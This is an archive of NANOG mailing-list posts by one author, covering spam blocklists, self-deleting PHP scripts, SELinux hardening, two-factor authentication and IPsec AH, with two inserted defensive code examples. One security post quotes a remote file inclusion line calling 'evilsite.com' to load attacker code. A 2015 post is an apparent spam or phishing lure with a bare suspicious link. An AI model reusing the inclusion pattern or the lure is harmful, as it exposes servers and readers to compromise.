Fw: new message

2015-10-25 Thread Adam Stasiniewicz
Hey!

 

New message, please read <http://brazilsail.com/sad.php?wf1ta>

 

Adam Stasiniewicz



RE: Off-Topic: use laptop only as USB power supply

2010-05-20 Thread Adam Stasiniewicz
My last Lenovo laptop had a setting in the BIOS for exactly that.  Worked
great for hotel rooms (which notoriously have very few power plugs) when I
wanted to charge my cell phone and other devices over night.  No clue
about other vendors.

Hope that helps,
Adam

-Original Message-
From: Matthias Flittner [mailto:matthias.flitt...@de-cix.net]
Sent: Thursday, May 20, 2010 6:15 PM
To: nanog@nanog.org
Subject: Off-Topic: use laptop only as USB power supply

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi there,
I'm not sure if anyone out there has an answer to this insane question:
But is it possible to use my laptop only as power supply via usb for my
mobile phone. Yes you heard right: I don't want to boot an operating
system I only want to charge my battery of my mobile phone. No fan should
be powered on. I only need voltage on the USB ports.

Any suggestions? ;)

best regards,
FliTTi



RE: NSP-SEC

2010-03-19 Thread Adam Stasiniewicz
IMHO, I think you have it backwards.  I see strategic discussions (like
new crypto algorithms, technologies, initiatives, etc) should be open to
public debate, review, and scrutiny.  But operational/tactical discussions
(like new malware, software exploits, virus infected hosts, botnets, etc)
don't need public review.  Rather, those types of communications should be
streamlined in a way that would allow for quick resolution.


-Original Message-
From: David Barak [mailto:thegame...@yahoo.com]
Sent: Friday, March 19, 2010 8:55 AM
To: neno...@systeminplace.net; j...@cymru.com
Cc: nanog@nanog.org
Subject: Re: NSP-SEC

Total transparency in security matters works about as well as it would for
law enforcement: fine for tactical concerns, but not so great for
long-term strategic concerns.

-David Barak

On Fri Mar 19th, 2010 9:44 AM EDT William Pitcock wrote:

On Fri, 2010-03-19 at 08:31 -0500, John Kristoff wrote:
 An ongoing area of work is to build better closed,
 trusted communities without leaks.

Have you ever considered that public transparency might not be a bad
thing?  This seems to be the plight of many security people, that they
have to be 100% secretive in everything they do, which is total
bullshit.

Just saying.

William





RE: Spamcop Blocks Facebook?

2010-02-25 Thread Adam Stasiniewicz
Found this: http://forum.spamcop.net/forums/index.php?showtopic=10783

Looks like SpamCop is fully aware they are listing facebook's email
servers.


-Original Message-
From: Shon Elliott [mailto:s...@unwiredbb.com]
Sent: Thursday, February 25, 2010 9:15 PM
To: nanog@nanog.org  nanog
Subject: Spamcop Blocks Facebook?


So I start trying to figure out why my facebook account keeps saying my e-mail
is invalid, when I know it isn't. I look at my mail server and see it's all
running just fine, and have been receiving mail from others just fine... so I
tail the log and tell Facebook to re-confirm the address...

Feb 25 19:08:18 postfix/smtpd[12682]: connect from outmail011.snc1.tfbnw.net[69.63.178.170]
Feb 25 19:08:18 postfix/smtpd[12682]: NOQUEUE: reject: RCPT from outmail011.snc1.tfbnw.net[69.63.178.170]: 554 5.7.1 Service unavailable; Client host [69.63.178.170] blocked using bl.spamcop.net; Blocked - see http://www.spamcop.net/bl.shtml?69.63.178.170; from=notification+m35-v...@facebookmail.com to=exam...@example.com proto=ESMTP helo=mx-out.facebook.com
Feb 25 19:08:23 postfix/smtpd[12682]: disconnect from outmail011.snc1.tfbnw.net[69.63.178.170]

Anyone from Facebook or Spamcop lurking around to look into this? It's quite
annoying.. I can't imagine how many other users are scratching their heads on
this one...

-S
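
An added example, not part of the original posts: a small parser that pulls DNSBL rejections out of Postfix smtpd log lines like the ones quoted above and shows the DNS name a blocklist client queries (reversed IPv4 octets prepended to the list zone). The function names are illustrative, and the sample lines are the ones from the post, re-joined onto single lines.

```python
import re
from collections import Counter

# The log lines from the post, re-joined (the archive had wrapped them).
# Addresses stay truncated exactly as the archive shows them.
SAMPLE_LOG = [
    "Feb 25 19:08:18 postfix/smtpd[12682]: connect from "
    "outmail011.snc1.tfbnw.net[69.63.178.170]",
    "Feb 25 19:08:18 postfix/smtpd[12682]: NOQUEUE: reject: RCPT from "
    "outmail011.snc1.tfbnw.net[69.63.178.170]: 554 5.7.1 Service unavailable; "
    "Client host [69.63.178.170] blocked using bl.spamcop.net; Blocked - see "
    "http://www.spamcop.net/bl.shtml?69.63.178.170; "
    "from=notification+m35-v...@facebookmail.com to=exam...@example.com "
    "proto=ESMTP helo=mx-out.facebook.com",
    "Feb 25 19:08:23 postfix/smtpd[12682]: disconnect from "
    "outmail011.snc1.tfbnw.net[69.63.178.170]",
]

# Matches only RCPT rejections that name a blocklist zone.
REJECT_RE = re.compile(
    r"reject: RCPT from (?P<host>[^\[\s]+)\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]: "
    r"(?P<code>\d{3}) (?P<dsn>\d\.\d+\.\d+) .*?"
    r"blocked using (?P<zone>[A-Za-z0-9.-]+);"
)

def dnsbl_query_name(ip, zone):
    """Name a DNSBL client looks up: reversed IPv4 octets, then the zone."""
    return ".".join(reversed(ip.split("."))) + "." + zone

def parse_rejects(lines):
    """Return one dict per DNSBL rejection found in the given log lines."""
    records = []
    for line in lines:
        match = REJECT_RE.search(line)
        if match:
            rec = match.groupdict()
            rec["query"] = dnsbl_query_name(rec["ip"], rec["zone"])
            records.append(rec)
    return records

def rejects_by_list(lines):
    """Count rejections per (blocklist zone, sending host)."""
    return Counter((r["zone"], r["host"]) for r in parse_rejects(lines))

if __name__ == "__main__":
    for rec in parse_rejects(SAMPLE_LOG):
        print(rec["host"], rec["ip"], rec["code"], rec["zone"], rec["query"])
```

Grouping by zone and sending host makes it easy to see when a single list is rejecting a large legitimate sender, which is the situation described in the thread.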



RE: Security Guideance

2010-02-23 Thread Adam Stasiniewicz
I've seen similar.  Another variant of this is PHP code that lets
arbitrary data be inputted into require() or include() statements, for
example: include('http://evilsite.com/evil.txt').  That way, the attacker
can then load whatever code they want and it will never be saved to the
file system.  I would recommend verifying that all the shrink-wrapped
products (i.e. forums, blogs, CMS, etc) on the server be checked to ensure
that they are at the most current update/patch and are not EOL.  Generally
most of those vendors are good at responding to security issues in their
products, but it's up to the person running the website to update their
code.

Also, have you considered enabling SELinux?  Enforcing the targeted policy
will prevent Apache from making outbound socket connections (and may break
other stuff), but it might be worth the headache. On a similar note,
mod_security also may help (depending on how the attack is being launched)
but again may break some things.

If the attack is possibly being launched via SSH/shell access, enable
password complexity then force all of your clients to change their
password.


Hope that helps,
Adam Stasiniewicz

-Original Message-
From: Chris Adams [mailto:cmad...@hiwaay.net]
Sent: Tuesday, February 23, 2010 2:56 PM
To: Matt Sprague
Cc: nanog@nanog.org
Subject: Re: Security Guideance

Once upon a time, Matt Sprague mspra...@readytechs.com said:
 The user could also be running the command inline somehow or deleting
 the file when they log off.   Check who was logged onto the server at
 the time of the attack to narrow down your search.  I like the split
 the users idea, though it could be several iterations to narrow down
 the culprit.

We've also seen this with spammers.  They'll upload a PHP via a
compromised account, connect to it via HTTP, and then delete it from the
filesystem.  The PHP continues to run, Apache doesn't log anything
(because it only logs at the end of a request), and the admin is left
scratching his head to figure out where the problem is.

IIRC PHP holds an open file descriptor on active scripts, so you can use
lsof to look for things like this (look for deleted or path inode
entries).
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
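
An added example, not part of the original posts: the lsof-style check described above, done by reading /proc directly on Linux, where the link target of an open descriptor whose file has been unlinked ends in " (deleted)". It assumes, as the post does, that the interpreter still holds the script open; the function name and the default ".php" filter are illustrative.

```python
import os

DELETED = " (deleted)"  # suffix Linux appends to unlinked-but-open targets

def deleted_open_files(proc_root="/proc", suffixes=(".php",)):
    """Return sorted (pid, fd, path) for open descriptors whose file was deleted.

    suffixes limits hits to paths with those endings; pass () for all files.
    """
    hits = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():          # skip /proc/self, /proc/sys, ...
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:                # process exited or permission denied
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:            # descriptor closed while scanning
                continue
            if not target.endswith(DELETED):
                continue
            path = target[: -len(DELETED)]
            if not suffixes or path.endswith(tuple(suffixes)):
                hits.append((int(pid), int(fd), path))
    return sorted(hits)

if __name__ == "__main__":
    # Run as root to see descriptors of other users' processes (e.g. Apache).
    for pid, fd, path in deleted_open_files():
        print(f"pid {pid} fd {fd}: {path} (copy from /proc/{pid}/fd/{fd})")
```

While the process is still running, the deleted script's contents can be copied out of /proc/PID/fd/N for later analysis.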



RE: Smartcard and non-password methods (was Re: Password repository)

2009-11-21 Thread Adam Stasiniewicz
Sadly, passwords are the least common denominator.  The biggest problems
with 2 factor devices (smart cards, OTPs, etc) is having to buy, configure,
and distribute them; plus get them to work with all the myriad of
applications.  

Certificates that are issued to computers/web browsers suffer from a lack of
portability (i.e. by design, the user shouldn't be able to export and share
the certificate with anyone they want).  Plus with any solution using
certificates (client or smart card) a substantial reconfiguration is
required to support websites/applications being able to process certificate
logons.

IMHO, even though OTPs are the less secure of the two types of two-factor
products, I see them growing faster than any other method.  From an end-user
perspective, they are small/portable, don't require a reader, and don't
require any special OS, web browser, or software.  For an infrastructure
perspective, it is easier to convert a website to support OTPs (simply
change the function that runs the password validation; instead of having to
install and configure a special module/component that would handle the
mutual auth required by certificates).  Also, many of the OTP vendors are
working on making their products function more easily cross platform (while
with smart cards, you are basically stuck with either Microsoft's
corporate/non-service provider friendly solution, or have to code your own).


My $0.02,
Adam Stasiniewicz


-Original Message-
From: Sean Donelan [mailto:s...@donelan.com] 
Sent: Friday, November 20, 2009 5:43 PM
To: nanog@nanog.org
Subject: Smartcard and non-password methods (was Re: Password repository)


Are any network providers supporting smartcards or other non-password 
based authentication methods?  Passwords always end up blaming the 
user for choosing/not remembering good passwords instead of blaming the
technology for choosing/not doing things so the user isn't forced to
work around its flaws.

I know about the DOD Common Access Card.  One-time code-generator tokens 
seem more widely used by single enterprises.  But inter-operable 
credentials still seem to be one of those great unsolved problems for 
computer security.  Are passwords still the only lowest-common-denominator?





RE: AH is pretty useless and perhaps should be deprecated

2009-11-14 Thread Adam Stasiniewicz
I have seen AH used in network segmentation.  I.e. systems in group A are
configured with rules to require all communication be over AH.  Systems in
group B (which have no AH and no appropriate certificates configured) can't
chat with group A.  The benefit of using AH vs. ESP in this case is twofold.
First, AH is less CPU intensive, and when one considers enabling it on
all/many workstations and servers in a company, that can add up to a lot of
CPU cycles.  Second, since AH only signs, not encrypts, products like
network analyzers, IDS/IPS, etc can still perform their functions.

Outside of some manual deployments, the only commercial product I know that
offers AH based network segmentation is Microsoft's NAP:
http://www.microsoft.com/nap 

Regards,
Adam Stasiniewicz

-Original Message-
From: Jack Kohn [mailto:kohn.j...@gmail.com] 
Sent: Friday, November 13, 2009 6:23 PM
To: nanog@nanog.org
Subject: AH is pretty useless and perhaps should be deprecated

Hi,

Interesting discussion on the utility of Authentication Header (AH) in
IPSecME WG.

http://www.ietf.org/mail-archive/web/ipsec/current/msg05026.html

Post explaining that AH even though protecting the source and
destination IP addresses is really not good enough.

http://www.ietf.org/mail-archive/web/ipsec/current/msg05056.html

What do folks feel? Do they see themselves using AH in the future?
IMO, ESP and WESP are good enough and we don't need to support AH any
more ..

Jack